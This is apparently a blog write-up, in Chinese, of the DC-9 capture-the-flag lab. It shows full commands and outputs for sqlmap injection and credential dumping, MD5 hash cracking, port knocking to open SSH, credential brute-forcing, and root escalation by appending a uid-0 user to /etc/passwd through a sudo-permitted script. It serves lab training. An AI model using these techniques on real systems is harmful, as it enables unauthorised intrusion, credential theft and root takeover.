Mamor's Blog
0%

DCchallenges9

发表于 更新于 分类于
本文字数: 5.2k 阅读时长 ≈ 5 分钟

信息收集

环境

网段 192.168.18.0/24

kali 192.168.18.131

靶机 192.168.18.142

扫描网段

kali@kali2020:~$ sudo nmap 192.168.18.0/24 -sn Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 20:27 CST Nmap scan report for 192.168.18.2 Host is up (0.00039s latency). MAC Address: 00:50:56:E0:DA:9A (VMware) Nmap scan report for 192.168.18.142 Host is up (0.00043s latency). MAC Address: 00:0C:29:C2:75:62 (VMware) Nmap scan report for 192.168.18.254 Host is up (0.00018s latency). MAC Address: 00:50:56:FD:0E:3D (VMware) Nmap scan report for 192.168.18.131 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.12 seconds

扫描靶机端口

kali@kali2020:~$ sudo nmap 192.168.18.142 -p- -sV Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 20:35 CST Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 93.02% done; ETC: 20:36 (0:00:00 remaining) Nmap scan report for 192.168.18.142 Host is up (0.0014s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 00:0C:29:C2:75:62 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds kali@kali2020:~$

SQL注入

发现一个搜索框和登录框,看下是否存在sql注入

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --dbs --batch

得到三个数据库

available databases [3]: [*] information_schema [*] Staff [*] users

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users --tables

Database: users [1 table] +-------------+ | UserDetails | +-------------+

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users -T UserDetails --columns

Database: users Table: UserDetails [6 columns] +-----------+-----------------+ | Column | Type | +-----------+-----------------+ | firstname | varchar(30) | | id | int(6) unsigned | | lastname | varchar(30) | | password | varchar(20) | | reg_date | timestamp | | username | varchar(30) | +-----------+-----------------+

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users -T UserDetails -C username,password --dump结果发现这是display页面的信息换另一个表跑一下

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D Staff --tables

Database: Staff [2 tables] +--------------+ | StaffDetails | | Users | +--------------+

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D Staff -T Users --column

Database: Staff Table: Users [3 columns] +----------+-----------------+ | Column | Type | +----------+-----------------+ | Password | varchar(255) | | UserID | int(6) unsigned | | Username | varchar(255) |

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D Staff -T Users -C Username,Password --dump

Database: Staff Table: Users [1 entry] +----------+----------------------------------+ | Username | Password | +----------+----------------------------------+ | admin | 856f5de590ef37314e7c3bdf6f8a66dc | +----------+----------------------------------+

跑出admin 856f5de590ef37314e7c3bdf6f8a66dc

md5解出来transorbital1

跑出另一个数据库的数据

sqlmap -u "http://192.168.18.142/results.php" --method POST --data "search=a123" --batch -D users -T UserDetails -C username,password --dump

Database: users Table: UserDetails [17 entries] +-----------+---------------+ | username | password | +-----------+---------------+ | marym | 3kfs86sfd | | julied | 468sfdfsd2 | | fredf | 4sfd87sfd1 | | barneyr | RocksOff | | tomc | TC&TheBoyz | | jerrym | B8m#48sd | | wilmaf | Pebbles | | bettyr | BamBam01 | | chandlerb | UrAG0D! | | joeyt | Passw0rd | | rachelg | yN72#dsd | | rossg | ILoveRachel | | monicag | 3248dsds7s | | phoebeb | smellycats | | scoots | YR3BVxxxw87 | | janitor | Ilovepeepee | | janitor2 | Hawaii-Five-0 | +-----------+---------------+

manage.php登录下试试,成功登录

页面左下角有一个File does not exist推测有本地文件包含漏洞

使用的apache

用burp 爆破了下LFI字典 没发现有用的信息

去试试之前跑出来的用户账号能不能ssh登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# username
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#passwd
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0

发现全是连接失败,但是nmap扫描端口的时候22端口是开放的

网上搜了下,这是使用的knock服务(端口敲门服务)

knock服务

Knockd的配置文件路径为/etc/knockd.conf

开放了7469,8475,9842三个端口

在默认情况下,22端口是关闭的,只有访问了以上三个端口后,22端口才会开放。

使用nmap访问以上三个端口

访问后在去连接ssh,ssh端口可以访问

最后试出了三组可以ssh登录的账号

chandlerb UrAG0D! joeyt Passw0rd janitor Ilovepeepee

janitor用户下发现一个隐藏文件夹,里面包含一个密码本

1
2
3
4
5
6
7
8
# passwords-found-on-post-it-notes.txt 

BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

跑出了一个账号

fredf B4-Tru3-001

提权

不需要密码可以执行/opt/devstuff/dist/test/test

提示test是个py文件

找一下test.py

find / -name "test.py" 2>/dev/null

发现两个文件

/opt/devstuff/test.py /usr/lib/python3/dist-packages/setuptools/command/test.py

估计只有第一个可以用得上

cat /opt/devstuff/test.py

需要两个参数,把第一个参数的内容追加到第二个文件中

使用openssl创建一个用户

openssl passwd -1 -salt Mamor 123456 $1$Mamor$y58eSo9.PqQRr.NOp4Ltp/

构造一个用户

Mamor:$1$Mamor$y58eSo9.PqQRr.NOp4Ltp/:0:0::/root:/bin/bash

echo "Mamor:\(1\)Mamor$y58eSo9.PqQRr.NOp4Ltp/:0:0::/root:/bin/bash" > /tmp/mamor

sudo ./test /tmp/mamor /etc/passswd

构造失败没法写入

cat /tmp/mamor

发现写入的数据并不是原数据

'试试

echo 'Mamor:$1$Mamor$y58eSo9.PqQRr.NOp4Ltp/:0:0::/root:/bin/bash' > /tmp/mamor1

还是没法写入

openssl passwd -1 -salt test test

\(1\)test$pi/xDtU5WFVRqYS6BMU8X/

echo 'test:$1$test$pi/xDtU5WFVRqYS6BMU8X/:0:0::/root:/bin/bash' >> /tmp/testtest

sudo ./test /tmp/testtest /etc/passwd

cat /etc/passwd

test:\(1\)test$pi/xDtU5WFVRqYS6BMU8X/:0:0::/root:/bin/bash

这次写入成功

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------